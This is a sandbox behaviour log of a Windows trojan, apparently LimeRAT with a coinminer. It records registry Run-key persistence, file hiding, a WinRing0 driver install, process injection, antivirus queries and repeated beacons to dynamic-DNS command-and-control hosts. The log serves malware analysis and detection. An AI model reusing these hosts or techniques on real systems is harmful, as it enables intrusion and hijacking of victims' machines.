cmdline cmd /c del "C:\Users\test22\AppData\Local\Temp\versioncd.bat"
cmdline cmd /c del "C:\Windows (x86)\xcls.bat"
cmdline attrib -s -h "C:\Windows (x86)\*.*"
cmdline ping 127.0.0.1 -n 5
cmdline C:\Windows\sysnative\cmd /c "C:\Users\test22\AppData\Local\Temp\E3A9.tmp\E3AA.bat C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.exe"
cmdline attrib +s +h "C:\Users\test22\AppData\Roaming\AppData\Windows Protector\*.*"
wmi select * from win32_logicaldisk
host 54.254.238.33
Time & API Arguments Status Return Repeated

InternetCrackUrlW

url: http://niogem1171.ddns.net:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.ddnsking.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.3utilities.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.bounceme.net:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.freedynamicdns.net:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.freedynamicdns.org:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.gotdns.ch:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.hopto.org:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.myftp.biz:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.myftp.org:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.myvnc.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.onthewifi.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.redirectme.net:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.servebeer.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.serveblog.net:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.servecounterstrike.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.serveftp.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.servegame.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.servehttp.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.servehalflife.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.serveirc.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.serveminecraft.net:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.servemp3.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.servequake.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.servepics.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Windows Logons reg_value C:\Windows (x86)\explorer.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Windows Updates reg_value C:\Users\test22\AppData\Roaming\AppData\Windows Updates\winupdate.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\helps reg_value "C:\Users\test22\AppData\Local\Temp\helps.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\helps reg_value "C:\Users\test22\AppData\Local\Temp\helps.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z reg_value "C:\Users\test22\AppData\Local\Temp\z.vbs"
Time & API Arguments Status Return Repeated

CreateServiceW

service_start_name:
start_type: 3
password:
display_name: WinRing0_1_2_0
filepath: C:\Windows (x86)\WinRing0x64.sys
service_name: WinRing0_1_2_0
filepath_r: C:\Windows (x86)\WinRing0x64.sys
desired_access: 983551
service_handle: 0x0000000000112310
error_control: 1
service_type: 1
service_manager_handle: 0x0000000000112160
1 1123088 0
cmdline wmic process where name='xmrig.exe' delete
registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
wmi select * from antivirusproduct
wmi select * from win32_operatingsystem
wmi select * from win32_logicaldisk
Time & API Arguments Status Return Repeated

WSASend

buffer:  ¿VÇa·ì”ùökՔi*,%`]»‘¶¼wőìÛ x—¾×IÐeÈôY‘7‘’È[§’6B_ú“€à»'>À,À0ŸÌ©Ì¨ÌªÀ+À/žÀ$À(kÀ#À'gÀ À9À À3œ=<5/ÿ•  # 0.   + -3&$ œÃ°(ÓB œõ—f7|U“_Ù˃æàRî"ªLØˤ(
socket: 588
0 0

WSASend

buffer: Eº9qÂX­eªs"Z“/§òh¤e&â/o.ˆQö&9êœeœ}ª«¦ÑºNb6¤iðñ]Kéö’p2V-mtQžâpÚ ?d:–eArÈrò,½^xOíZ;S`ßPƒªàdb\Šì’°‚]Ïê_×-ïåÈýðr˵jF!îAÄ]—8;ֆŠYi¦_Œa`ÇM$<Ú¬Ak ‘&¤ŽÈç(>øÆNô¹| iøºBÅ£Täй3˜ú?=äÛ~ë°Õ…Ì¢à,Dª')na!¡ò¥Lq±âk½Ž¾ÆE/2x«Gh5Thð lë:Þc1~jÊï"r~b‡)È®äbûfªþ6×j7OU­°¡z0Õõåìò’ސëøí¨ß|Å ú]l!šÕ ê–0b…ÖŽˆîL~±\¹µ”zÙ¦€ª=Ùëþî5®’·ìÄò®Ëª†æ¤ÎmŽÌ1¬jçK'Š1›Éùè„Ù‚3—8 mé¿Áþˆ1J.¦wÆÄ'º¬¬YžÛ­Ëd­±›+z9úUµ(ÛZ$‡ „{9 ´†g%H¯®¾Åõ) _©ˆx;ü“V*¨A ¹m@ÓÝ*¾º×ˆµê¡QÐþ‡Õ¾Ý—D°Ó(\®Ru».±ÝRGsY©TÝFyª^™„!¾õÞâ( ^ÚÇۓ– >üDÜÒüL±?Œ)X‘K2 Ëp[È©‹í Àj¶r”ƒé5™ ó‡—+ûbßö½{KâlnNœ’¦‰ƒ§ æ¬ïÄ´5϶*ìùÐX²Ó2ä·ÙUÕ=dn}6ØÐåÞâØ!™Cåcļ5ӌmsfÆ<ºhÁù1x²‹û2ݚì#¥§É›iöO9˜ã™™iA³6+JQ<«$rPnÏ)ý
socket: 588
0 0
process certutil.exe useragent CertUtil URL Agent
process wscript.exe useragent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Time & API Arguments Status Return Repeated

InternetCrackUrlW

url: http://niogem1171.ddns.net:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.ddnsking.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.3utilities.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.bounceme.net:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.freedynamicdns.net:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.freedynamicdns.org:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

send

buffer: !
socket: 996
sent: 1
1 1 0

InternetCrackUrlW

url: http://niogem1171.gotdns.ch:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.hopto.org:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.myftp.biz:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.myftp.org:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.myvnc.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.onthewifi.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.redirectme.net:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.servebeer.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.serveblog.net:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.servecounterstrike.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.serveftp.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.servegame.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.servehttp.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.servehalflife.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.serveirc.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.serveminecraft.net:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.servemp3.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.servequake.com:16039/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x0000000000cc0008
http_version:
flags: 73400320
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

url: http://niogem1171.servepics.com:16039/is-ready
flags: 0
1 1 0
parent_process wscript.exe martian_process C:\Users\test22\AppData\Local\Temp\helps.vbs
parent_process wscript.exe martian_process "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\helps.vbs"
parent_process wscript.exe martian_process "C:\Users\test22\AppData\Local\Temp\updateW\1xcls.bat"
parent_process wscript.exe martian_process C:\Users\test22\AppData\Local\Temp\updateW\1xcls.bat
parent_process wscript.exe martian_process "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\z.vbs"
parent_process wscript.exe martian_process C:\Users\test22\AppData\Local\Temp\z.vbs
parent_process wscript.exe martian_process "C:\Windows (x86)\xcls.bat"
parent_process wscript.exe martian_process C:\Windows (x86)\xcls.bat
url http://54.254.238.33
file C:\Users\test22\AppData\Roaming\AppData\Windows Protector\winlogins.exe:Zone.Identifier
Process injection Process 2984 resumed a thread in remote process 3068
Process injection Process 3068 resumed a thread in remote process 2608
Process injection Process 3068 resumed a thread in remote process 2740
Process injection Process 3068 resumed a thread in remote process 2976
Process injection Process 3068 resumed a thread in remote process 2568
Process injection Process 3068 resumed a thread in remote process 2860
Process injection Process 3068 resumed a thread in remote process 2964
Process injection Process 3068 resumed a thread in remote process 3576
Process injection Process 3068 resumed a thread in remote process 3648
Process injection Process 3068 resumed a thread in remote process 296
Process injection Process 3896 resumed a thread in remote process 4008
Process injection Process 4008 resumed a thread in remote process 3244
Process injection Process 4008 resumed a thread in remote process 3892
Process injection Process 2644 resumed a thread in remote process 3836
Process injection Process 2644 resumed a thread in remote process 1968
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000208
suspend_count: 1
process_identifier: 3068
1 0 0

NtResumeThread

thread_handle: 0x000000000000006c
suspend_count: 0
process_identifier: 2608
1 0 0

NtResumeThread

thread_handle: 0x000000000000006c
suspend_count: 0
process_identifier: 2740
1 0 0

NtResumeThread

thread_handle: 0x000000000000006c
suspend_count: 0
process_identifier: 2976
1 0 0

NtResumeThread

thread_handle: 0x000000000000028c
suspend_count: 1
process_identifier: 2568
1 0 0

NtResumeThread

thread_handle: 0x0000000000000298
suspend_count: 1
process_identifier: 2860
1 0 0

NtResumeThread

thread_handle: 0x0000000000000108
suspend_count: 0
process_identifier: 2964
1 0 0

NtResumeThread

thread_handle: 0x000000000000023c
suspend_count: 0
process_identifier: 3576
1 0 0

NtResumeThread

thread_handle: 0x0000000000000108
suspend_count: 0
process_identifier: 3648
1 0 0

NtResumeThread

thread_handle: 0x0000000000000298
suspend_count: 1
process_identifier: 296
1 0 0

NtResumeThread

thread_handle: 0x0000000000000204
suspend_count: 1
process_identifier: 4008
1 0 0

NtResumeThread

thread_handle: 0x000000000000006c
suspend_count: 0
process_identifier: 3244
1 0 0

NtResumeThread

thread_handle: 0x0000000000000200
suspend_count: 1
process_identifier: 3892
1 0 0

NtResumeThread

thread_handle: 0x0000000000000068
suspend_count: 0
process_identifier: 3836
1 0 0

NtResumeThread

thread_handle: 0x0000000000000074
suspend_count: 0
process_identifier: 1968
1 0 0
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2208
thread_handle: 0x0000000000000068
process_identifier: 3836
current_directory:
filepath: C:\Windows (x86)\explorer.exe
track: 1
command_line: "C:\Windows (x86)\explorer.exe"
filepath_r: C:\Windows (x86)\explorer.exe
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000074
1 1 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

information_class: 76 (SystemFirmwareTableInformation)
-1073741789 0
Bkav W32.AIDetect.malware2
MicroWorld-eScan Trojan.GenericKD.47423426
CAT-QuickHeal Trojan.MsilFC.S19436131
ALYac IL:Trojan.MSILZilla.7623
Cylance Unsafe
Sangfor Exploit.Win32.Certutil.tm
K7AntiVirus Trojan ( 0056e5201 )
Alibaba TrojanPSW:Win32/Stealer.e23b010f
K7GW Trojan ( 0056e5201 )
Cybereason malicious.19949e
Arcabit Trojan.Generic.D2D39FC2
Cyren VBS/Agent.ABA
Symantec Trojan.Gen.6
Elastic malicious (high confidence)
ESET-NOD32 multiple detections
APEX Malicious
Kaspersky Exploit.Win32.Certutil.tm
BitDefender Trojan.GenericKD.47423426
NANO-Antivirus Trojan.Script.Agent.fbgfaf
Avast VBS:Dropper-UN [Trj]
Tencent Win32.Trojan.Blocker.Wqcw
Emsisoft Trojan.GenericKD.47423426 (B)
Comodo Malware@#1sbof9vw77lzu
DrWeb Trojan.Siggen10.39470
TrendMicro Coinminer.MSIL.LIMERAT.SMA
McAfee-GW-Edition BehavesLike.Win32.Backdoor.gc
FireEye Generic.mg.d55af7419949eb16
Sophos Mal/Generic-S
SentinelOne Static AI - Malicious SFX
Avira TR/Crypt.XPACK.Gen7
Gridinsoft Trojan.Win64.Downloader.oa!s1
Microsoft Backdoor:Win32/LimeRat.YA!MTB
GData Win64.Trojan.Agent.AWK8T5
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win.Disfa.C4407000
McAfee Artemis!D55AF7419949
MAX malware (ai score=87)
VBA32 Trojan.Downloader
Malwarebytes Malware.AI.4186108609
TrendMicro-HouseCall TROJ_GEN.R002H0CDU22
Rising Backdoor.LimeRat!1.B863 (CLASSIC:bWQ1OiJM5M03mm8M)
Ikarus Win32.Outbreak
MaxSecure Trojan.Malware.300983.susgen
Fortinet VBS/Agent.AN!tr
BitDefenderTheta Gen:NN.ZemsilF.34638.biW@ayUARzm
AVG VBS:Dropper-UN [Trj]
CrowdStrike win/malicious_confidence_100% (W)
dead_host 3.1.85.243:16039
dead_host 3.1.85.243:11069
dead_host 3.1.85.243:16020